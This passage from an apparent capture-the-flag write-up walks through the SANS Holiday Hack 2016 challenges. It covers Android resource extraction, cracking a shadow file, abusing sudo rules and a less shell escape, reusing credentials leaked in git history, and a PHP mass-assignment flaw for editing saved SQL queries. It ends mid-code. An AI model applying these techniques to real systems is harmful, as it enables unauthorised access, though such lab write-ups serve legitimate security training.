   &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;activity&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt; &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;SplashScreen&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
   &lt;/span&gt;&lt;span class=&quot;nl&quot;&gt;&quot;udid&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;:&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;     &lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;&quot;ae26ee9299bb87f0&quot;&lt;/span&gt;&lt;span class=&quot;w&quot;&gt;
&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/figure&gt;

&lt;p&gt;We will probably have to take a different approach to our analysis in order to acquire the hidden audio that we’re looking for, as it seems unlikely this is going to travel across the wire. Let’s follow the excellent advice of another SANS blog post, &lt;a href=&quot;https://pen-testing.sans.org/blog/2016/12/10/mining-android-secrets-decoding-android-app-resources&quot;&gt;Mining Android Secrets (Decoding Android App Resources)&lt;/a&gt;, once again by Ed Skoudis.&lt;/p&gt;

&lt;p&gt;We pass our Android application through &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;apktool&lt;/code&gt; in order to extract the resources contained therein. Since we know we’re looking for an audio file, we could guess that we’re looking for a file with extension &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.mp3&lt;/code&gt; and use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;find -iname '*.mp3'&lt;/code&gt; to try and find it, which turns up &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;res/raw/discombobulatedaudio1.mp3&lt;/code&gt; (MD5 hash &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;b7aca2f218c39b997bfd61b83856aed2&lt;/code&gt;).&lt;/p&gt;

&lt;p&gt;By also examining the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;res/values/strings.xml&lt;/code&gt; resource, we see the following further endpoints referenced which will be important for part 4 of the challenge:&lt;/p&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dev.northpolewonderland.com (35.184.63.245)&lt;/code&gt;&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dungeon.northpolewonderland.com (35.184.47.139)&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
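&lt;p&gt;As an added check, not part of the original post: a Python scan of an apktool-decoded &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;strings.xml&lt;/code&gt; that pulls out every hostname referenced by a URL-valued resource and flags resources whose names suggest a hardcoded credential, covering both the endpoint list above and the embedded-credentials question from the dynamic analysis. The sample resource file is constructed; only its hostnames echo what the post found.&lt;/p&gt;

```python
"""Scan an apktool-decoded res/values/strings.xml for embedded endpoints and
credential-like resources.  Added example for this writeup, not the original
post's code; the sample resource file is constructed (only the hostnames
echo the writeup)."""
import re
import xml.etree.ElementTree as ET

# Constructed sample in apktool's res/values/strings.xml layout.  Resource
# names and paths are invented; the placeholder password is obviously fake.
SAMPLE_STRINGS_XML = """<resources>
    <string name="app_name">SantaGram</string>
    <string name="analytics_launch_url">https://analytics.northpolewonderland.com/placeholder-path</string>
    <string name="debug_data_collection_url">http://dev.northpolewonderland.com/placeholder-path</string>
    <string name="dungeon_url">http://DUNGEON.northpolewonderland.com/placeholder-path</string>
    <string name="analytics_password">PLACEHOLDER-NOT-A-REAL-SECRET</string>
    <string name="welcome_message">Welcome to SantaGram!</string>
    <string-array name="mirror_urls">
        <item>https://analytics.northpolewonderland.com/placeholder-mirror</item>
        <item>not a url</item>
    </string-array>
</resources>
"""

# Scheme plus host of a URL-valued resource; the host is group 2.
URL_RE = re.compile(r"^(https?|wss?)://([^/:?#]+)", re.IGNORECASE)
# Resource names that suggest a hardcoded credential.
SECRET_NAME_RE = re.compile(
    r"(pass(word)?|pwd|secret|token|api_?key|credential)", re.IGNORECASE)


def iter_string_resources(root):
    """Yield (resource_name, text) for <string> elements and for each <item>
    of a <string-array>, which inherits the array's name."""
    for elem in root.iter("string"):
        yield elem.get("name", ""), (elem.text or "").strip()
    for arr in root.iter("string-array"):
        for item in arr.findall("item"):
            yield arr.get("name", ""), (item.text or "").strip()


def scan_strings_xml(xml_text):
    """Return (hosts, secrets): sorted unique lower-cased hostnames found in
    URL-valued resources, and (name, value) pairs whose resource name looks
    like a credential."""
    root = ET.fromstring(xml_text)
    hosts = set()
    secrets = []
    for name, value in iter_string_resources(root):
        match = URL_RE.match(value)
        if match:
            hosts.add(match.group(2).lower())
        if SECRET_NAME_RE.search(name):
            secrets.append((name, value))
    return sorted(hosts), secrets


if __name__ == "__main__":
    hosts, secrets = scan_strings_xml(SAMPLE_STRINGS_XML)
    print("Endpoints referenced:")
    for host in hosts:
        print("  " + host)
    print("Credential-like resources:")
    for name, value in secrets:
        print("  %s = %s" % (name, value))
```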

&lt;h2 id=&quot;part-3-a-fresh-baked-holiday-pi&quot;&gt;Part 3: A Fresh-Baked Holiday Pi&lt;/h2&gt;

&lt;p&gt;Back in the story world, we’ve been hard at work tracking down the parts of the Cranberry Pi. Upon acquiring the Cranberry Pi board from the hidden fireplace room, the HDMI cable from the reindeer stables (moo!), the power cord from beside the snowman, the heatsink from the loft area, and the SD card from the end of the walkway in the clouds, it is now time to revisit Holly Evergreen. She provides us with the final piece of the Cranberry Pi puzzle: a &lt;a href=&quot;http://www.northpolewonderland.com/cranbian.img.zip&quot;&gt;link to the firmware image, Cranbian&lt;/a&gt;, that runs on the pi board. She tells us that we need to recover the password for the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cranpi&lt;/code&gt; user account in order to be able to use the pi board in the story world.&lt;/p&gt;

&lt;p&gt;Having downloaded and extracted the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cranbian.img&lt;/code&gt; file, we follow the advice of another convenient blog post, &lt;a href=&quot;https://pen-testing.sans.org/blog/2016/12/07/mount-a-raspberry-pi-file-system-image&quot;&gt;Mount a Raspberry Pi File System Image&lt;/a&gt;, again by Ed Skoudis.&lt;/p&gt;

&lt;p&gt;Once we have the image mounted, we can grab the shadow file from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/etc/shadow&lt;/code&gt; and follow the hints provided to us by Minty Candycan in the story world by pointing John The Ripper at it using the RockYou wordlist. In no time at all, the password cracking software has recovered the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cranpi&lt;/code&gt; user’s password: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;yummycookies&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Upon telling Holly Evergreen the password to the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;cranpi&lt;/code&gt; user account, we now find ourselves with the ability to interact with the various terminals that are dotted throughout the story world.&lt;/p&gt;

&lt;h3 id=&quot;terminal---elf-house-2&quot;&gt;Terminal - Elf House #2&lt;/h3&gt;
&lt;p&gt;This terminal greets us with the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;*******************************************************************************
*                                                                             *
*To open the door, find both parts of the passphrase inside the /out.pcap file* 
*                                                                             *
*******************************************************************************
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Examining the permissions of the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/out.pcap&lt;/code&gt; file shows us that it is owned by user &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;itchy&lt;/code&gt; and only they have permission to read the file, but unfortunately our primary prompt string indicates that our shell is running in the context of user &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;scratchy&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Let’s see if we have any &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;sudo&lt;/code&gt; permissions:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;scratchy@2bb2b19b8c63:~$ sudo -l
&amp;lt;Matching Defaults entries for scratchy on 1fae5a6f6ac5:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User scratchy may run the following commands on 1fae5a6f6ac5:
    (itchy) NOPASSWD: /usr/sbin/tcpdump
    (itchy) NOPASSWD: /usr/bin/strings
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;It would seem that we are able to run the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tcpdump&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;strings&lt;/code&gt; commands as &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;itchy&lt;/code&gt; without having to know our own password, how convenient. Let’s first pass the packet capture file through strings to see if there are any interesting plaintext tokens:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;scratchy@2bb2b19b8c63:~$ sudo -u itchy strings -20 /out.pcap
BGET /firsthalf.html HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
OServer: SimpleHTTP/0.6 Python/2.7.12+
ODate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: text/html
PContent-Length: 113
PLast-Modified: Fri, 02 Dec 2016 11:25:35 GMT
&amp;lt;input type=&quot;hidden&quot; name=&quot;part1&quot; value=&quot;santasli&quot; /&amp;gt;
DGET /secondhalf.bin HTTP/1.1
User-Agent: Wget/1.17.1 (darwin15.2.0)
Accept-Encoding: identity
Host: 192.168.188.130
Connection: Keep-Alive
TServer: SimpleHTTP/0.6 Python/2.7.12+
TDate: Fri, 02 Dec 2016 11:28:00 GMT
Content-type: application/octet-stream
UContent-Length: 1048097
Last-Modified: Fri, 02 Dec 2016 11:26:12 GMT
3{&quot;host_int&quot;: 266670160730277518981342002975279884847, &quot;version&quot;: [2, 0], &quot;displayname&quot;: &quot;&quot;, &quot;p
ort&quot;: 17500, &quot;namespaces&quot;: [1149071040, 1139770785, 1357103393, 1296963687, 1139786665, 1261247
053, 1331126254, 1179166992, 1210559602, 1261612467, 1223790038, 1234538553, 1304191898, 124630
1403, 1056298300, 1207374239]}
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We can see the output from an HTTP request to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;http://192.168.188.130/firsthalf.html&lt;/code&gt; which, in the response body, includes a hidden HTML field called &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;part1&lt;/code&gt; with value &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;santasli&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;We could have a crack at the second half, which appears to be contained within the binary response body of a similar request to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/secondhalf.bin&lt;/code&gt;, which would almost certainly require some &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tcpdump&lt;/code&gt;-fu, or we could take a (correct!) guess that the password to the door accompanying the terminal is &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;santaslittlehelper&lt;/code&gt;.&lt;/p&gt;

&lt;h3 id=&quot;terminal---workshop-near-reindeer&quot;&gt;Terminal - Workshop (near reindeer)&lt;/h3&gt;
&lt;p&gt;This terminal greets us with the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;*******************************************************************************
*                                                                             *
* Find the passphrase from the wumpus.  Play fair or cheat; it's up to you.   * 
*                                                                             *
*******************************************************************************
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We are running under the context of user &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;elf&lt;/code&gt; and have a single file in our home directory, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;wumpus&lt;/code&gt;, which is an executable. For this challenge, I started out by just playing the game (it’s fairly simple to beat, after all) and killed the Wumpus. I’m sorry, Wumpus. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;WUMPUS IS MISUNDERSTOOD&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;Later, I performed a more detailed analysis of the executable by encoding it as base64 out to the terminal, copying that to an isolated x86_64 Debian VM, and reverse engineering it using GDB.&lt;/p&gt;

&lt;p&gt;We find that there are several command line options which can be supplied to the executable:&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-a&lt;/code&gt;: specify number of arrows the player starts with&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-b&lt;/code&gt;: specify number of bats present in the cave&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-h&lt;/code&gt;: hard mode, which tightens constraints on starting positions and room/tunnel/bat/pit ratios and “last chances”&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-p&lt;/code&gt;: specify number of pits present in the cave&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-r&lt;/code&gt;: specify number of rooms in the cave&lt;/li&gt;
  &lt;li&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-t&lt;/code&gt;: specify number of tunnels in the cave&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Some of these parameters have constraints applied to them, for example the number of rooms has to be greater than 5.&lt;/p&gt;

&lt;p&gt;Using these parameters, we can cheat and make the game trivial to complete, for example by making a cave with 6 rooms and 5 tunnels, in which case we just shoot into every room from our starting room until we inevitably hit the poor Wumpus.&lt;/p&gt;

&lt;h3 id=&quot;terminal---train&quot;&gt;Terminal - Train&lt;/h3&gt;
&lt;p&gt;With this terminal, we are dropped into the “Train Management Console”. Using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HELP&lt;/code&gt; drops us into a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;less&lt;/code&gt; session, presenting instructions on how to operate the train, along with a Cranberry pie recipe. As the instructions hint at, being in &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;less&lt;/code&gt; gives us the ability to execute commands using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;!&lt;/code&gt;. Using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;!ls&lt;/code&gt; we can see the working directory contains three files: &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ActivateTrain&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;TrainHelper.txt&lt;/code&gt; and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Train_Console&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;TrainHelper.txt&lt;/code&gt; is presumably the file we’re reading, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;Train_Console&lt;/code&gt; is the “Train Management Console” we were dropped into in the first place, and &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ActivateTrain&lt;/code&gt; is an executable which triggers the ability to travel back in time. We can therefore call the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ActivateTrain&lt;/code&gt; executable from the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;HELP&lt;/code&gt; context using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;!./ActivateTrain&lt;/code&gt; or we can also use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;strings&lt;/code&gt; on the console script to discover the passphrase of &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;24fb3e89ce2aa0ea422c3d511d40dd84&lt;/code&gt; which can be used to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;START&lt;/code&gt; the train via the management console legitimately, once the brakes have been released with &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;BRAKEOFF&lt;/code&gt;.&lt;/p&gt;

&lt;h3 id=&quot;terminal---workshop-near-staircase&quot;&gt;Terminal - Workshop (near staircase)&lt;/h3&gt;
&lt;p&gt;This terminal greets us with the following banner&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;*******************************************************************************
*                                                                             *
* To open the door, find the passphrase file deep in the directories.         * 
*                                                                             *
*******************************************************************************
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Here, we use the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;find&lt;/code&gt; command to list the files and directories under the home folder recursively:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@019f15a853ea:~/.doormat$ find
.
./. 
./. / 
./. / /\
./. / /\/\\
./. / /\/\\/Don't Look Here!
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/'/key_for_the_door.txt
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/cookbook
./. / /\/\\/Don't Look Here!/You are persistent, aren't you?/temp
./. / /\/\\/Don't Look Here!/secret
./. / /\/\\/Don't Look Here!/files
./. / /\/\\/holiday
./. / /\/\\/temp
./. / /\/santa
./. / /\/ls
./. / /opt
./. / /var
./. /bin
./. /not_here
./share
./temp
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;We can see the file which we are probably interested in - &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;key_for_the_door.txt&lt;/code&gt; - so we use &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;find&lt;/code&gt; once again combined with the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;-exec&lt;/code&gt; flag to read its contents, without having to worry about traversing the awkwardly named directories ourselves:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;elf@019f15a853ea:~/.doormat$ find -name 'key_for_the_door.txt' -exec cat {} \;
key: open_sesame
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;terminal---santas-office&quot;&gt;Terminal - Santa’s Office&lt;/h3&gt;

&lt;p&gt;This terminal drops us into another interactive script rather than a shell, and we are greeted with the following famous line&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GREETINGS PROFESSOR FALKEN.
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;This challenge requires that we answer the prompts as was done in the 1983 movie &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;War Games&lt;/code&gt;, as follows:&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;GREETINGS PROFESSOR FALKEN.

Hello.


HOW ARE YOU FEELING TODAY?

I'm fine. How are you?


EXCELLENT, IT'S BEEN A LONG TIME. CAN YOU EXPLAIN THE REMOVAL OF YOUR USER ACCOUNT ON 6/23/73?

People sometimes make mistakes.


YES THEY DO. SHALL WE PLAY A GAME?

Love to. How about Global Thermonuclear War?


WOULDN'T YOU PREFER A GOOD GAME OF CHESS?

Later. Let's play Global Thermonuclear War.


FINE

,------~~v,_         _                     _--^\
 |'          \   ,__/ ||                 _/    /,_ _
/             \,/     /         ,,  _,,/^         v v-___
|                    /          |'~^                     \
\                   |         _/                     _ _/^
 \                 /         /                   ,~~^/ | 
  ^~~_       _ _   /          |          __,, _v__\   \/
      '~~,  , ~ \ \           ^~       /    ~   //
          \/     \/             \~,  ,/          
                                   ~~
   UNITED STATES                   SOVIET UNION
WHICH SIDE DO YOU WANT?
     1.    UNITED STATES
     2.    SOVIET UNION
PLEASE CHOOSE ONE: 
2

AWAITING FIRST STRIKE COMMAND
-----------------------------
PLEASE LIST PRIMARY TARGETS BY
CITY AND/OR COUNTRY NAME: 

Las Vegas
LAUNCH INITIATED, HERE'S THE KEY FOR YOUR TROUBLE: 

LOOK AT THE PRETTY LIGHTS

Press Enter To Continue
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;h3 id=&quot;conclusion-of-part-3&quot;&gt;Conclusion of Part 3&lt;/h3&gt;
&lt;p&gt;Between these terminals, we are granted access to all but one door in the quest world. Using the terminal in the workshop beside the reindeer stables lets us into the DFER (or Dungeon For Errant Reindeer), which is empty in the present day but contains the captive Santa Claus if we travel back to 1978 using the train terminal.&lt;/p&gt;

&lt;h2 id=&quot;part-4-my-gosh-its-full-of-holes&quot;&gt;Part 4: My Gosh… It’s Full of Holes&lt;/h2&gt;

&lt;p&gt;In this part, we exploit the following targets as referenced in the SantaGram android application, and as per Tom Hessman’s confirmation that they are in-scope.&lt;/p&gt;

&lt;h3 id=&quot;the-mobile-analytics-server-1&quot;&gt;The Mobile Analytics Server #1&lt;/h3&gt;
&lt;p&gt;This server appears to be an endpoint for collecting and querying analytics data. Retrieval of the first MP3 file on this site is trivial; we log into the web application using the credentials we recovered in part 2 (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;guest:busyreindeer78&lt;/code&gt;) and are presented with a menu item at the top labeled “MP3”. Clicking this downloads &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;discombobulatedaudio2.mp3&lt;/code&gt; (MD5 hash &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;f05c1ec6c536e455ec686973fa6b8e20&lt;/code&gt;).&lt;/p&gt;

&lt;h3 id=&quot;the-mobile-analytics-server-2&quot;&gt;The Mobile Analytics Server #2&lt;/h3&gt;
&lt;p&gt;Using &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;nmap&lt;/code&gt; to scan the analytics server, with the standard set of scripts enabled (thanks to Holly Evergreen from the quest world for the tip), yields the revelation that the source code for the web application is hosted on the server in the form of a bare git repository at &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/.git/&lt;/code&gt;. Recursively downloading this bare repository and checking it out allows us to peruse the source code for the web application in its current state, as well as to view the history of the application’s development.&lt;/p&gt;

&lt;p&gt;From the history, we can see that the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;SQL&lt;/code&gt; for generating the database schema and static data for the site had in it at some point a set of credentials for the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;administrator&lt;/code&gt; user (introduced in commit &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;85a4207c178fa0f9c6b6bb77a6d42eac487159c0&lt;/code&gt; and removed in commit &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;85a4207c178fa0f9c6b6bb77a6d42eac487159c0&lt;/code&gt;):&lt;/p&gt;

&lt;div class=&quot;language-plaintext highlighter-rouge&quot;&gt;&lt;div class=&quot;highlight&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;INSERT INTO `users` VALUES (0,'administrator','KeepWatchingTheSkies'),(1,'guest','busyllama67');
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;

&lt;p&gt;Trying these credentials in the web application reveals that this password has not been rotated since it was committed to and removed from source control, and allows us to access more of the web application’s functionality, most interestingly the “experimental” ability to modify saved queries against the data.&lt;/p&gt;

&lt;p&gt;By querying the data, making sure to save the query (which returns us its key, a GUID), and then using the edit functionality, we are able to modify the SQL statement for that saved query, because the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;edit.php&lt;/code&gt; code searches the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;GET&lt;/code&gt; query parameters exhaustively for any matching the columns from the database schema, whilst the UI only allows editing of the query name and description. The vulnerable code is shown below:&lt;/p&gt;

&lt;figure class=&quot;highlight&quot;&gt;&lt;pre&gt;&lt;code class=&quot;language-php&quot; data-lang=&quot;php&quot;&gt;    &lt;span class=&quot;c1&quot;&gt;# Update the row with the new values&lt;/span&gt;
    &lt;span class=&quot;nv&quot;&gt;$set&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;[];&lt;/span&gt;
    &lt;span class=&quot;k&quot;&gt;foreach&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$row&lt;/span&gt; &lt;span class=&quot;k&quot;&gt;as&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$name&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&amp;gt;&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$value&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;Checking for &quot;&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nb&quot;&gt;htmlentities&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$name&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;...&amp;lt;br&amp;gt;&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;k&quot;&gt;if&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;k&quot;&gt;isset&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$_GET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$name&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;]))&lt;/span&gt; &lt;span class=&quot;p&quot;&gt;{&lt;/span&gt;
        &lt;span class=&quot;k&quot;&gt;print&lt;/span&gt; &lt;span class=&quot;s1&quot;&gt;'Yup!&amp;lt;br&amp;gt;'&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
        &lt;span class=&quot;nv&quot;&gt;$set&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[]&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;`&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$name&lt;/span&gt;&lt;span class=&quot;s2&quot;&gt;`='&quot;&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;nf&quot;&gt;mysqli_real_escape_string&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$db&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;nv&quot;&gt;$_GET&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;nv&quot;&gt;$name&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;])&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;'&quot;&lt;/span&gt;&lt;span class=&quot;p&quot;&gt;;&lt;/span&gt;
      &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;
    &lt;span class=&quot;p&quot;&gt;}&lt;/span&gt;

    &lt;span class=&quot;nv&quot;&gt;$query&lt;/span&gt; &lt;span class=&quot;o&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;s2&quot;&gt;&quot;UPDATE `reports` &quot;&lt;/span&gt; &lt;span class=&quot;mf&quot;&gt;.&lt;/span&gt;
